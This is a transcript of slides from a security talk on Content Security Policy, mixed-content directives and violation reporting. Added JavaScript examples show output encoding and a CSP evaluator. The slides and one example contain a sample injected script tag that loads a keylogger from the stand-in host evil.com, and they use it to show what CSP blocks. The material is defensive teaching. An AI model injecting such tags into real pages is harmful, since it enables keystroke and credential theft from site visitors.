d3ldn17 - recruiting the browser

Recruiting The Browser @Scott_Helme | scotthelme.co.uk Scott Helme

Upload: imperva-incapsula

Post on 21-Jan-2018


TRANSCRIPT

Page 1: D3LDN17 - Recruiting the Browser

Recruiting The Browser
@Scott_Helme | scotthelme.co.uk
Scott Helme


How security has evolved

Page 11: D3LDN17 - Recruiting the Browser

Browser support

Page 12: D3LDN17 - Recruiting the Browser

Content Security Policy

Page 13: D3LDN17 - Recruiting the Browser

Content Injection

<html>
<body>
<comment>
<script src="evil.com/keylogger.js"></script>
</comment>
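The injection the slide sketches, written out as an added example (not code from the slides): a naive comment renderer that concatenates user text into the page beside one that HTML-encodes it first. The attacker comment and the small script-tag detector are constructed for the demo; CSP, covered on the following slides, is the second line of defence behind this kind of output encoding.

```javascript
// Added example, not from the slides. Constructed attacker input with the
// payload shape shown on the "Content Injection" slide.
const ATTACKER_COMMENT = '<script src="https://evil.com/keylogger.js"></script>';

// Vulnerable: user-supplied text is dropped straight into the markup, so a
// comment can close the text context and open a <script> element.
function renderCommentUnsafe(text) {
  return `<div class="comment">${text}</div>`;
}

// Hardened: encode the five characters that can change HTML context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

function renderCommentSafe(text) {
  return `<div class="comment">${escapeHtml(text)}</div>`;
}

// Crude check used only to make the difference visible: does the rendered
// output still contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe :', renderCommentUnsafe(ATTACKER_COMMENT));
console.log('safe   :', renderCommentSafe(ATTACKER_COMMENT));
```

The unsafe renderer emits the attacker's tag verbatim and the browser will fetch evil.com/keylogger.js; the safe one emits `&lt;script ...&gt;`, which renders as text. A CSP whose script-src does not list evil.com blocks the fetch even when the encoding step is missed.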

Page 14: D3LDN17 - Recruiting the Browser

What is CSP?

cache-control: max-age=0, no-cache

content-encoding: gzip

content-security-policy: [policy goes here]

date: Tue, 17 Oct 2017 11:30:00

server: Incapsula

status: 200

Page 15: D3LDN17 - Recruiting the Browser

CSP Directives

child-src
connect-src
default-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src

Page 16: D3LDN17 - Recruiting the Browser

A basic policy

Content-Security-Policy: default-src 'self' example.com

Page 17: D3LDN17 - Recruiting the Browser

Fine tuning

Content-Security-Policy: default-src 'self'; script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com

<script src="https://ajax.googleapis.com/.../jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js"></script>

Page 18: D3LDN17 - Recruiting the Browser

Fine tuning

Content-Security-Policy: default-src 'self';
script-src [source list];
style-src [source list];
img-src [source list];
frame-src [source list];

Page 19: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 20: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 21: D3LDN17 - Recruiting the Browser

Mixed-Content

Page 22: D3LDN17 - Recruiting the Browser

Mixed-Content

block-all-mixed-content

<img src="http://imgur.com/Incapsula-D3.png">

Page 23: D3LDN17 - Recruiting the Browser

Mixed-Content

upgrade-insecure-requests

<img src="http://imgur.com/Incapsula-D3.png">
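What the two mixed-content directives on the last slides do to the imgur image when the page itself is served over https, as an added example (not code from the slides). The no-directive case models the browser default of blocking active mixed content (scripts) while letting passive content (images) load with a warning; the rules are a simplification of the Mixed Content and Upgrade Insecure Requests specs, and the page and CDN URLs are constructed.

```javascript
// Added example, not from the slides. Models how a browser treats an
// http:// subresource requested from an https:// document under
// block-all-mixed-content, upgrade-insecure-requests, or neither.

// "Optionally-blockable" content in the Mixed Content spec: loads by default
// but is flagged as mixed content. Everything else is blocked by default.
const PASSIVE_TYPES = new Set(['img', 'audio', 'video']);

// upgrade-insecure-requests: http -> https and ws -> wss. An explicit :80
// is already normalised away by the URL parser, so it becomes the https
// default of 443; any other explicit port (e.g. :8080) is kept.
function upgradeUrl(urlString) {
  const url = new URL(urlString);
  if (url.protocol === 'http:') url.protocol = 'https:';
  else if (url.protocol === 'ws:') url.protocol = 'wss:';
  return url.href;
}

// Decide the fate of one subresource fetch. `policy` is the raw CSP header
// value; only the two mixed-content directives are consulted here.
function resolveMixedContent({ documentUrl, type, url, policy = '' }) {
  const doc = new URL(documentUrl);
  const target = new URL(url);
  const directives = new Set(
    policy.split(';').map((d) => d.trim().toLowerCase()).filter(Boolean),
  );
  const insecure = target.protocol === 'http:' || target.protocol === 'ws:';
  if (doc.protocol !== 'https:' || !insecure) return { url: target.href, action: 'load' };
  // When both directives are present the upgrade takes precedence.
  if (directives.has('upgrade-insecure-requests')) return { url: upgradeUrl(target.href), action: 'upgraded' };
  if (directives.has('block-all-mixed-content')) return { url: target.href, action: 'blocked' };
  return PASSIVE_TYPES.has(type)
    ? { url: target.href, action: 'load-with-warning' }   // browser default for images
    : { url: target.href, action: 'blocked' };            // browser default for scripts, frames, XHR...
}

// Constructed inputs: the image from the slide on an https page.
const PAGE = 'https://scotthelme.co.uk/';
const IMG = 'http://imgur.com/Incapsula-D3.png';

function demoMixedContent() {
  const run = (type, url, policy) => resolveMixedContent({ documentUrl: PAGE, type, url, policy });
  return {
    imageNoDirective: run('img', IMG),
    scriptNoDirective: run('script', 'http://cdn.example.com/app.js'),
    imageBlockAll: run('img', IMG, "default-src 'self'; block-all-mixed-content"),
    imageUpgrade: run('img', IMG, "default-src 'self'; upgrade-insecure-requests"),
    scriptUpgradeCustomPort: run('script', 'http://cdn.example.com:8080/app.js', 'upgrade-insecure-requests'),
    alreadySecure: run('img', 'https://imgur.com/Incapsula-D3.png', 'block-all-mixed-content'),
  };
}

console.log(JSON.stringify(demoMixedContent(), null, 2));
```

block-all-mixed-content is the strict choice: the image simply fails to load, which is what you want once the site is known to be clean. upgrade-insecure-requests is the migration aid: the browser rewrites the request to https before sending it, so legacy http:// references keep working as long as the host actually serves https.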

Page 24: D3LDN17 - Recruiting the Browser

Testing CSP

Content-Security-Policy-Report-Only: [policy]

Console:

Refused to load the script 'https://code.jquery.com/jquery.1.11.3min.js' because it violates the following Content Security Policy directive: script-src

Page 25: D3LDN17 - Recruiting the Browser

Testing CSP

Content-Security-Policy-Report-Only: [policy]

report-uri https://report-uri.io

{
  "csp-report": {
    "document-uri": "http://scotthelme.co.uk/blah/",
    "violated-directive": "default-src https:",
    "effective-directive": "img-src",
    "blocked-uri": "http://imgur.com" ...
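How a browser applies the policies from the "Fine tuning" slides and produces the report shown on the "Testing CSP" slides, as an added example (not code from the slides): a small CSP evaluator that parses the header, resolves a fetch to its governing directive (falling back to default-src), matches source expressions ('self', 'none', '*', scheme sources such as https:, host sources such as *.example.com:443/path) and emits the report-uri JSON in enforce or Report-Only mode. Nonces, hashes and 'unsafe-inline' are out of scope; the page URL and the script paths in the demo are constructed, not the ones elided on the slides.

```javascript
// Added example, not from the slides: a minimal CSP evaluator.

// Parse "default-src 'self'; script-src 'self' cdnjs.cloudflare.com" into
// { "default-src": ["'self'"], "script-src": ["'self'", "cdnjs.cloudflare.com"] }.
function parsePolicy(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A browser honours only the first occurrence of a directive name.
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Does one source expression match the requested URL? docUrl is the page
// carrying the policy: 'self' compares origins, and a scheme-less host
// source inherits the page's scheme (or allows an https upgrade).
function sourceMatches(source, url, docUrl) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === docUrl.origin;
  if (s === '*') return ['http:', 'https:', 'ws:', 'wss:'].includes(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;          // scheme-source, e.g. "https:"
  // host-source: [scheme://]host[:port][/path]; the host may carry a "*." prefix.
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?(\/.*)?$/i.exec(source);
  if (!m) return false;                                                    // malformed source never matches
  const [, scheme, wildcard, host, port, path] = m;
  const schemeOk = scheme
    ? url.protocol === scheme.toLowerCase() + ':'
    : url.protocol === docUrl.protocol || url.protocol === 'https:';
  if (!schemeOk) return false;
  const h = host.toLowerCase();
  if (wildcard ? !url.hostname.endsWith('.' + h) : url.hostname !== h) return false;
  const DEFAULT_PORT = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };
  if (port === undefined) {
    if (url.port !== '') return false;                                     // no port given: default port only
  } else if (port !== '*' && (url.port || DEFAULT_PORT[url.protocol]) !== port) {
    return false;
  }
  if (path !== undefined && !(path.endsWith('/') ? url.pathname.startsWith(path) : url.pathname === path)) return false;
  return true;
}

// Fetch directives consult default-src when their own directive is absent.
function governingDirective(directives, type) {
  const own = `${type}-src`;
  if (own in directives) return own;
  return 'default-src' in directives ? 'default-src' : null;
}

// Decide one fetch. reportOnly models Content-Security-Policy-Report-Only:
// the violation is still reported, but the load goes ahead.
function checkRequest(policy, { documentUrl, type, url, reportOnly = false }) {
  const directives = parsePolicy(policy);
  const doc = new URL(documentUrl);
  const target = new URL(url);
  const name = governingDirective(directives, type);
  if (name === null) return { allowed: true, report: null };              // nothing restricts this fetch
  const sources = directives[name];
  if (sources.some((src) => sourceMatches(src, target, doc))) return { allowed: true, report: null };
  // Shape of the JSON a browser POSTs to report-uri, as on the slide;
  // blocked-uri is reduced to an origin for cross-origin loads.
  const report = {
    'csp-report': {
      'document-uri': documentUrl,
      'violated-directive': `${name} ${sources.join(' ')}`,
      'effective-directive': `${type}-src`,
      'blocked-uri': target.origin === doc.origin ? target.href : target.origin,
      'original-policy': policy,
      disposition: reportOnly ? 'report' : 'enforce',
    },
  };
  return { allowed: reportOnly, report };
}

// Constructed demo with the policy from the "Fine tuning" slide.
const POLICY = "default-src 'self'; script-src 'self' cdnjs.cloudflare.com ajax.googleapis.com";
const PAGE = 'https://scotthelme.co.uk/blah/';

function demoPolicy(reportOnly = false) {
  const run = (type, url) => checkRequest(POLICY, { documentUrl: PAGE, type, url, reportOnly });
  return {
    jqueryFromGoogle: run('script', 'https://ajax.googleapis.com/libs/jquery.min.js'),
    jqueryFromJqueryCom: run('script', 'https://code.jquery.com/jquery.min.js'),
    keylogger: run('script', 'https://evil.com/keylogger.js'),
    imgurImage: run('img', 'http://imgur.com/Incapsula-D3.png'),
    ownStylesheet: run('style', 'https://scotthelme.co.uk/site.css'),
  };
}

console.log(JSON.stringify(demoPolicy(), null, 2));
```

The imgur case reproduces the report on the slide: there is no img-src, so the browser falls back to default-src, names that directive and its value in violated-directive, and records img-src as the effective-directive. Run with demoPolicy(true) the same violations are reported but every load is allowed, which is the point of deploying Report-Only first.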

Page 28: D3LDN17 - Recruiting the Browser

Other Security Headers

Content-Security-Policy
Content-Security-Policy-Report-Only
X-Webkit-Content-Security-Policy
X-Content-Security-Policy
Public-Key-Pins
Public-Key-Pins-Report-Only
Expect-Staple
Expect-CT
X-Xss-Protection

Page 31: D3LDN17 - Recruiting the Browser

Secure all the things!

@Scott_Helme | scotthelme.co.uk

Scott Helme